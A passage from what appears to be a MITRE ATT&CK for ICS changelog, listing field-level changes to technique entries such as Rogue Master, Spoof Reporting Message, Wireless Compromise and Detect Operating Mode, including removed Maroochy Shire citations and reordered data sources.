  An adversary can potentially modify these parameters to produce an outcome outside of what was intended by the operators. By modifying system and process critical parameters, the adversary may cause [Impact](https://attack.mitre.org/tactics/TA0105) to equipment and/or control processes. Modified parameters may be turned into dangerous, out-of-bounds, or unexpected values from typical operations. For example, specifying that a process run for more or less time than it should, or dictating an unusually high, low, or invalid value as a parameter.
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[1]: Network Traffic: Network Traffic Content → Operational Databases: Device Alarm
x_mitre_data_sources[3]: Operational Databases: Device Alarm → Network Traffic: Network Traffic Content
x_mitre_version: 1.1 → 1.2
iterable_item_removed
STIX Field: Removed value
external_references: {'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0848] Rogue Master

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection.

In the Maroochy Shire attack, the adversary falsified network addresses in order to send false data and instructions to pumping stations.(Citation: Marshall Abrams July 2008)

In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)

New Description:

Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection.

In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)
Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 18:11:21.376000+00:00 → 2023-03-30 20:18:41.277000+00:00
description:
  Old value: Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. In the Maroochy Shire attack, the adversary falsified network addresses in order to send false data and instructions to pumping stations.(Citation: Marshall Abrams July 2008) In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)
  New value: Adversaries may setup a rogue master to leverage control server functions to communicate with outstations. A rogue master can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master. Impersonating a master may also allow an adversary to avoid detection. In the case of the 2017 Dallas Siren incident, adversaries used a rogue master to send command messages to the 156 distributed sirens across the city, either through a single rogue transmitter with a strong signal, or using many distributed repeaters. (Citation: Bastille April 2017) (Citation: Zack Whittaker April 2017)
kill_chain_phases[0]['phase_name']: initial-access-ics → initial-access
external_references[2]['source_name']: Marshall Abrams July 2008 → Zack Whittaker April 2017
external_references[2]['description']: Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 → Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06
external_references[2]['url']: https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf → https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Application Log: Application Log Content → Network Traffic: Network Traffic Content
x_mitre_data_sources[1]: Asset: Asset Inventory → Operational Databases: Device Alarm
x_mitre_data_sources[2]: Operational Databases: Device Alarm → Asset: Asset Inventory
x_mitre_data_sources[3]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow
x_mitre_data_sources[4]: Network Traffic: Network Traffic Flow → Application Log: Application Log Content
x_mitre_version: 1.1 → 1.2
iterable_item_removed
STIX Field: Removed value
external_references: {'source_name': 'Zack Whittaker April 2017', 'description': "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", 'url': 'https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/'}

[T0856] Spoof Reporting Message

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.

If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)

In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)

New Description:

Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.

If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)
Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 18:16:21.548000+00:00 → 2023-03-30 20:19:14.351000+00:00
description:
  Old value: Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)
  New value: Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values. If an adversary has the ability to Spoof Reporting Messages, they can impact the control system in many ways. The adversary can Spoof Reporting Messages that state that the process is operating normally, as a form of evasion. The adversary could also Spoof Reporting Messages to make the defenders and operators think that other errors are occurring in order to distract them from the actual source of a problem.
  (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)
kill_chain_phases[0]['phase_name']: evasion-ics → evasion
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Network Traffic: Network Traffic Flow → Network Traffic: Network Traffic Content
x_mitre_data_sources[1]: Operational Databases: Device Alarm → Windows Registry: Windows Registry Key Modification
x_mitre_data_sources[2]: Windows Registry: Windows Registry Key Modification → Operational Databases: Device Alarm
x_mitre_data_sources[3]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow
x_mitre_version: 1.1 → 1.2
iterable_item_removed
STIX Field: Removed value
external_references: {'source_name': 'Marshall Abrams July 2008', 'description': 'Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ', 'url': 'https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf'}

[T0864] Transient Cyber Asset

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required.

Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices.

Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems.

In the Maroochy Shire attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.(Citation: Marshall Abrams July 2008)

New Description:

Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required.

Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices.

Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems.
Details
values_changed
STIX Field: Old value → New value
modified: 2022-10-20 18:13:19.252000+00:00 → 2023-03-30 20:19:41.272000+00:00
description:
  Old value: Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis. (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems. In the Maroochy Shire attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.(Citation: Marshall Abrams July 2008)
  New value: Adversaries may target devices that are transient across ICS networks and external networks. Normally, transient assets are brought into an environment by authorized personnel and do not remain in that environment on a permanent basis.
  (Citation: North American Electric Reliability Corporation June 2021) Transient assets are commonly needed to support management functions and may be more common in systems where a remotely managed asset is not feasible, external connections for remote access do not exist, or 3rd party contractor/vendor access is required. Adversaries may take advantage of transient assets in different ways. For instance, adversaries may target a transient asset when it is connected to an external network and then leverage its trusted access in another environment to launch an attack. They may also take advantage of installed applications and libraries that are used by legitimate end-users to interact with control system devices. Transient assets, in some cases, may not be deployed with a secure configuration leading to weaknesses that could allow an adversary to propagate malicious executable code, e.g., the transient asset may be infected by malware and when connected to an ICS environment the malware propagates onto other systems.
kill_chain_phases[0]['phase_name']: initial-access-ics → initial-access
external_references[1]['source_name']: Marshall Abrams July 2008 → North American Electric Reliability Corporation June 2021
external_references[1]['description']: Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 → North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11
external_references[1]['url']: https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf → https://www.nerc.com/files/glossary_of_terms.pdf
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_data_sources[0]: Application Log: Application Log Content → Network Traffic: Network Traffic Flow
x_mitre_data_sources[1]: Network Traffic: Network Traffic Flow → Application Log: Application Log Content
x_mitre_version: 1.1 → 1.2
iterable_item_removed
STIX Field: Removed value
external_references: {'source_name': 'North American Electric Reliability Corporation June 2021', 'description': 'North American Electric Reliability Corporation 2021, June 28 Glossary of Terms Used in NERC Reliability Standards Retrieved. 2021/10/11 ', 'url': 'https://www.nerc.com/files/glossary_of_terms.pdf'}

[T0855] Unauthorized Command Message

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description:

Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)

In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)

In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)

New Description:

Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)

In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)

New Mitigations:

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 18:10:48.892000+00:00 | 2023-04-05 14:16:02.811000+00:00
description | Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Maroochy Shire attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019) | Adversaries may send unauthorized command messages to instruct control system assets to perform actions outside of their intended functionality, or without the logical preconditions to trigger their expected function. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device's actions. An adversary could potentially instruct a control systems device to perform an action that will cause an [Impact](https://attack.mitre.org/tactics/TA0105). (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011) In the Dallas Siren incident, adversaries were able to send command messages to activate tornado alarm systems across the city without an impending tornado or other disaster. (Citation: Zack Whittaker April 2017) (Citation: Benjamin Freed March 2019)
external_references[3]['source_name'] | Marshall Abrams July 2008 | Zack Whittaker April 2017
external_references[3]['description'] | Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 | Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06
external_references[3]['url'] | https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf | https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Content
x_mitre_data_sources[1] | Operational Databases: Process/Event Alarm | Application Log: Application Log Content
x_mitre_data_sources[2] | Operational Databases: Process History/Live Data | Operational Databases: Process/Event Alarm
x_mitre_data_sources[4] | Network Traffic: Network Traffic Content | Operational Databases: Process History/Live Data
x_mitre_version | 1.1 | 1.2
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Zack Whittaker April 2017', 'description': "Zack Whittaker 2017, April 12 Dallas' emergency sirens were hacked with a rogue radio signal Retrieved. 2020/11/06 ", 'url': 'https://www.zdnet.com/article/experts-think-they-know-how-dallas-emergency-sirens-were-hacked/'}

[T0860] Wireless Compromise

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. In the Maroochy Shire attack, the adversary used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations.(Citation: Marshall Abrams July 2008) A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)

New Description
Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 20:40:16.860000+00:00 | 2023-03-30 20:20:38.285000+00:00
description | Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. In the Maroochy Shire attack, the adversary used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations.(Citation: Marshall Abrams July 2008) A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017) | Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)
kill_chain_phases[0]['phase_name'] | initial-access-ics | initial-access
external_references[5]['source_name'] | Marshall Abrams July 2008 | Shelley Smith February 2008
external_references[5]['description'] | Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 | Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17
external_references[5]['url'] | https://web.archive.org/web/20200802103218/https://www.mitre.org/sites/default/files/pdf/08_1145.pdf | https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 1.1 | 1.2
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | Application Log: Application Log Content
iterable_item_removed
STIX Field | Old value | New value
external_references | {'source_name': 'Shelley Smith February 2008', 'description': 'Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ', 'url': 'https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/'}
x_mitre_data_sources | Application Log: Application Log Content
Patches

[T0830] Adversary-in-the-Middle

Current version: 2.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-26 20:38:32.749000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | collection-ics | collection
x_mitre_data_sources[2] | Service: Service Creation | Process: Process Creation
x_mitre_data_sources[5] | Process: Process Creation | Service: Service Creation
iterable_item_added
STIX Field | Old value | New value
x_mitre_data_sources | Windows Registry: Windows Registry Key Modification
iterable_item_removed
STIX Field | Old value | New value
x_mitre_data_sources | Windows Registry: Windows Registry Key Modification

[T0802] Automated Collection

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-24 15:09:07.609000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | collection-ics | collection
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Command: Command Execution
x_mitre_data_sources[1] | File: File Access | Network Traffic: Network Traffic Content
x_mitre_data_sources[3] | Command: Command Execution | File: File Access

[T0858] Change Operating Mode

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-24 11:42:52.057000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | execution-ics | execution
kill_chain_phases[1]['phase_name'] | evasion-ics | evasion
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_data_sources[0] | Application Log: Application Log Content | Network Traffic: Network Traffic Content
x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Application Log: Application Log Content

[T0807] Command-Line Interface

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 15:30:18.702000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | execution-ics | execution

[T0885] Commonly Used Port

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-27 18:49:25.201000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | command-and-control-ics | command-and-control
x_mitre_data_sources[0] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content
x_mitre_data_sources[1] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow

[T0884] Connection Proxy

Current version: 1.1

Details
values_changed
STIX Field | Old value | New value
modified | 2022-10-20 21:01:00.402000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | command-and-control-ics | command-and-control
x_mitre_data_sources[0] | Network Traffic: Network Traffic Content | Network Traffic: Network Traffic Flow
x_mitre_data_sources[1] | Network Traffic: Network Traffic Flow | Network Traffic: Network Traffic Content

[T0812] Default Credentials

Current version: 1.0

Details
values_changed
STIX Field | Old value | New value
modified | 2022-09-19 14:07:23.199000+00:00 | 2023-03-09 18:38:51.471000+00:00
kill_chain_phases[0]['phase_name'] | lateral-movement-ics | lateral-movement

[T0868] Detect Operating Mode

Current version: 1.0


Old Description
Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:
* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017)
* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021)
* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021)
* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007)
* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007)
* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)

New Description
Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below:
* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017)
* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021)
* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021)
* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007)
* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007)
* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)
Details
values_changed
STIX Field | Old value | New value
modified | 2022-05-24 11:48:05.134000+00:00 | 2023-03-09 18:38:51.471000+00:00
description | Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: * Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) * Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) * Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) * Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) * Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) * Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron) | Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: * Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) * Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) * Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) * Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) * Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) * Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may 